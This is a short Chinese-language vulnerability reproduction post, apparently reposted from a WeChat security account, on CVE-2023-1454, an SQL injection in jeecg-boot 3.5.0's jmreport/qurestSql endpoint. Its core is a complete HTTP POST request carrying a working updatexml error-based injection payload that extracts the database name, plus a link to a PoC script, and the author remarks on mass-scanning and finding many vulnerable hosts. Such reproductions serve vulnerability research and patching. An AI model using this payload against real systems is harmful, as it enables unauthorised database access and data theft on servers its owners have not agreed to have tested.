漏洞简述
jeecg-boot3.5.0版本存在SQL注入漏洞,该漏洞源于文件 jmreport/qurestSql 存在安全问题, 通过参数 apiSelectId 导致SQL注入。
漏洞影响
jeecg-boot
3
.5
.0
版本
项目GitHub地址:https:
//github.com/zhangdaiscott/jeecg-boot
环境搭建参考:https:
//blog.csdn.net/qq_27536045/article/details/129944987
漏洞复现
POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: 127.0.0.1
Content-Type: application/json
Content-Length: 126
{"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select database())),1)) or '%%' like '"}
写个脚本批量跑一下发现还是特多的,嗯~很“刑”。
顺便更新到 Nuclei 插件里面去。
获取 POC
获取POC脚本
https://github.com/Sweelg/CVE-2023-1454-Jeecg-Boot-qurestSql-SQLvuln
End
原文始发于微信公众号(贝雷帽SEC):【漏洞复现】Jeecg-Boot- CVE-2023-1454(POC)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论